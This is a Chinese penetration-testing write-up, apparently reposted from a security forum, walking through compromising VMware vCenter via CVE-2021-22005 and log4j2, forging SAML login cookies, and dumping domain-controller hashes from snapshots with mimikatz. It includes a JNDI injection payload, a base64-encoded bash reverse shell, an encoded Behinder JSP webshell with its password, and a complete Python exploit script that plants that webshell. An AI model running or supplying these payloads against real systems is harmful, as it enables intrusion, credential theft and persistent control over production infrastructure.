作者:1409446623290120(先知社区) 原文:https://xz.aliyun.com/t/14893
坑点&技巧总结
总体流程分为三大步:
拿wenshell
获取登录Cookie
获取域控账密/hash(有域控的情况下)
相应的坑点&技巧也分别在不同的阶段说明,不想看过程的佬可以直接看总结:
上传webshell使用https协议;
存在多个漏洞时,优先使用CVE-2021-22005,因为该漏洞上去权限为root,不用进行提权;log4j2得到的shell一般也是root权限;
使用log4j2 Poc 时,注意/sso后面的域名信息;
获取登录Cookie阶段:
3gstudent大佬优化的脚本,获取Cookie时省去了装某些Python环境的麻烦;
下载data.mdb文件后,分析不出证书,可以重新下载或者将脚本上传到目标服务器试试;
获取到Cookie后,在IP后拼接/ui访问进入控制台页面;
在控制台生成的快照可能不在本机,需要在相似名字的辅助机器找找;
获取域控账密/hash阶段:
可以使用VM安装目录自带的Vmss2core,将vmem和vmsn文件转储为dmp文件;
获取webshell
https ://10.x.x.x
棱洞识别效果:
2、判断版本
https ://x.x.x.x/sdk/vimServiceVersions.xml
3、CVE-2021-22005
vCenter Server 7.0 < 7.0 U2c build-18356314
vCenter Server 6.7 < 6.7 U3o build-18485166
Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
6.7 vCenters Windows版本不受影响
/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/
获取vCenter Cookie登录
存储关键身份验证信息数据位置:
Linux:
/storage/db/vmware-vmdir/data.mdb
Windows:
C:ProgramDataVMwarevCenterServerdatavmdirddata.mdb
脚本一
https://github.com/horizon3ai/vcenter_saml_login/blob/main/vcenter_saml_login.py
pip3 install -r requirements.txt
OK啊,不出意料的报错了!
环境问题可能会浪费很多时间,回头不行再看,这里换个脚本。
脚本二
该脚本是经过大佬优化的,省去了装环境的麻烦。详情见:
https://3gstudent.github.io/vSphere开发指南6-vCenter-SAML-Certificates
先使用这个脚本,生成如下三个文件(如果data.mdb文件太大,就可以将该脚本上传到服务器上,然后生成下面三个文件):
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_ExtraCertFromMdb.py
这里重命名为1.py了:
python3 1.py data.mdb
再使用这个脚本:
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_GenerateLoginCookie.py
生成cookie:
python 2.py 10.x.x.x 10.x.x.x vsphere.local idp_cert.txt trusted_cert_1.txt trusted_cert_2.txt
其中vsphere.local是上一步获取到的Domain
获取cookie:
然后访问,F12添加cookie:
添加完后注意,不要直接刷新,而是访问https: //ip/ui,否则就会这样
这里在URL地址栏,拼接/ui刷新后即可进来:
获取域控账密/hash
进到控制台后,如果发现域控机器,就可以使用生成快照,然后用工具分析快照文件抓hash。
因为机器都是生产相关的机器,不能使用克隆虚拟机等的骚操作,所以这里只介绍生成快照的方式。
方法一:Volatility来取证获取hash
方法二:Vmss2core Dump hash
方式一 volatility
https://github.com/volatilityfoundation/volatility
https://github.com/volatilityfoundation/volatility3
没分析出来,volatility和volatility3都试了不行,遂放弃。
方式二 Vmss2core
该工具,在VM安装目录下自带,就不用去别的地方下载了。选中VM图标,右键“打开文件位置”即可。
需要注意的是,不能把他复制出来使用,直接把vmem和vmsn文件,复制到vmss2core所在目录即可:
目标 VM 是 Microsoft Windows 8/8.1、Windows Server 2012、Windows Server 2016 、Windows Server 2019,则执行-W8,否则使用-W:
vmss2core.exe -W8 "Snapshot42.vmsn" "Snapshot42.vmem"
https://learn.microsoft.com/zh-cn/windows-hardware/drivers/debugger/
https://github.com/gentilkiwi/mimikatz/releases
.load D:ToolsAnalysis Toolsmimikatzx64mimilib.dll
然后重新加载:
.reload
查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
换到lsass.exe进程中
.process /r /p ffffe001c2ddf080
!mimikatz
log4j2 注意事项
注意这里有个坑,不能盲目使用Poc:如果访问https://ip :port,跳转到了某个域名链接,那么/SSO/后面跟的就是该域名domain.com,如:
GET /websso/SAML2/SSO/domain.com?SAMLRequest= HTTP/1.1
Host: 10.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Forwarded-For: ${jndi:ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho}
cmd: whoami
否则就是vsphere.local
GET HTTP/1.1
Host: 10.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Forwarded-For: ${jndi:ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho}
cmd: whoami
echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4zLjEuMS8zMzMzMyAwPiYx | base64 -d |bash
这样子操作不太方便,不想进行添加用户/写公钥等复杂操作的话,我们写入冰蝎马:
路径为:
/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/
命令为:
echo -n c3VjY2VzcyE8JUBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YXguY3J5cHRvLiosamF2YXguY3J5cHRvLnNwZWMuKiIlPjwlIWNsYXNzIFUgZXh0ZW5kcyBDbGFzc0xvYWRlcntVKENsYXNzTG9hZGVyIGMpe3N1cGVyKGMpO31wdWJsaWMgQ2xhc3MgZyhieXRlIFtdYil7cmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsMCxiLmxlbmd0aCk7fX0lPjwlaWYgKHJlcXVlc3QuZ2V0TWV0aG9kKCkuZXF1YWxzKCJQT1NUIikpe1N0cmluZyBrPSJlNDVlMzI5ZmViNWQ5MjViIjtzZXNzaW9uLnB1dFZhbHVlKCJ1IixrKTtDaXBoZXIgYz1DaXBoZXIuZ2V0SW5zdGFuY2UoIkFFUyIpO2MuaW5pdCgyLG5ldyBTZWNyZXRLZXlTcGVjKGsuZ2V0Qnl0ZXMoKSwiQUVTIikpO25ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGMuZG9GaW5hbChuZXcgc3VuLm1pc2MuQkFTRTY0RGVjb2RlcigpLmRlY29kZUJ1ZmZlcihyZXF1ZXN0LmdldFJlYWRlcigpLnJlYWRMaW5lKCkpKSkubmV3SW5zdGFuY2UoKS5lcXVhbHMocGFnZUNvbnRleHQpO30lPg== | base64 -d > pgtest.jsp
然后访问:
https ://10.x.x.x/idm/..;/pgtest.jsp
冰蝎连接,密码是rebeyond
接下来就是上面获取Cookie的重复操作了。
附cve-2021-22005exp:
# -*- coding: utf-8 -*-
import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "<")
_str = _str.replace(">", ">")
_str = _str.replace(""", """)
return _str
def str_to_escaped_unicode(arg_str):
escaped_str = ''
for s in arg_str:
val = ord(s)
esc_uni = "\u{:04x}".format(val)
escaped_str += esc_uni
return escaped_str
def createAgent(target, agent_name, log_param):
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
headers = { "Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close" }
json_data = { "manifestSpec":{},
"objectType": "a2",
"collectionTriggerDataNeeded": True,
"deploymentDataNeeded":True,
"resultNeeded": True,
"signalCollectionCompleted":True,
"localManifestPath": "a7",
"localPayloadPath": "a8",
"localObfuscationMapPath": "a9" }
requests.post(url, headers=headers, json=json_data, verify=False)
def generate_manifest(webshell_location, webshell):
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
#set($orig_log = $appender.getFile())##
#set($logger = $GLOBAL-logger.logger.parent)##
$appender.setFile("%s")##
$appender.activateOptions()##
$logger.warn("%s")##
$appender.setFile($orig_log)##
$appender.activateOptions()##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (webshell_location, webshell)
return manifestData
def arg():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help = "Target", required = True)
args = parser.parse_args()
target = args.target
print("[*] Target: %s" % target)
return target
def exec():
target = arg()
# Variables
webshell_param = id_generator(6)
log_param = id_generator(6)
agent_name = id_generator(6)
shell_name = "test.jsp"
#webshell = """<% out.println("test");%>"""
webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
webshell = str_to_escaped_unicode(webshell)
manifestData = generate_manifest(webshell_location,webshell)
print("[*] Creating Agent")
createAgent(target, agent_name, log_param)
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
headers = {"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close"}
json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(url, headers=headers, json=json_data, verify=False)
#webshell
url = "%s/idm/..;/%s" % (target, shell_name)
code = requests.get(url=url, headers=headers,verify=False).status_code
if code != "404":
print("shell: %s" % url)
print("password: rebeyond" )
else:
print("not found test.jsp")
if __name__ == '__main__':
exec()
参考
https://daidaitiehanhan.github.io/2022/04/18/vCenter2021几个漏洞及后渗透/#后渗透
https://3gstudent.github.io/vSphere开发指南6-vCenter-SAML-Certificates
https://mp.weixin.qq.com/s/4JF0Hyqt38JW1VeCAG1qOg
原文始发于微信公众号(HACK之道):实战|记一次VMware vCenter渗透过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论